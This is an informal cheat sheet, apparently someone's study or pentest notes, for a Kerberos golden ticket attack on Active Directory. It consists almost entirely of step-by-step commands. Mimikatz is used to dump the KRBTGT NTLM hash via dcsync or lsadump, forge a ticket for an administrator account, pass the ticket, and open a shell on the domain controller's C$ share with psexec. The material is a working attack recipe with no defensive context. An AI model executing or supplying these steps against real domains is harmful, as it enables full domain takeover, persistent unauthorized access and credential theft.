Check if you're in the right priv

psexec.exe \\dc_name cmd.exe 

if this won't work then this won't work.

What you need:

1. Domain name:

2. SID:

whoami /user

3. KRBTGT NTLM Hash: (requires elevated priv) -> if we can obtain this, we can create our own TGT

• non-priv user is the member of the Domain Admin's group ---> DC will trust it if encrypted correctly

• The password hash doesn't change automatically, meaning there's a good chance that the old tickets are somewhere in the system!

run mimikatz

and

dcsync /domain:domainname.local /user:krbtgt
or 
lsadump::lsa /patch 

copy Hash NTLM value.

--

Use golden ticket to get an access to a domain group with the information you got!

on mimikatz command,

kerberos::golden /domain:domain.local /sid:SID_Value  /rc4:NTLM_HASH /id:500 /user:gori

• id value- pass in the id that you want to create an account for -> 500 - admin

• /user -> name it whatever!

After you create an account, pass the ticket

keberos::ptt ticket.kirbi

if you launch a command prompt now

misc::cmd

you will have priv of admin! You can access domain controllers file shares (and it doesn't expire for a long time!!!)

pushd \\domain_Controller\c$

or

psexec.exe \\dc01 cmd.exe 

to launch a command prompt with the newly created DC account.

check your group memberships

whoami /groups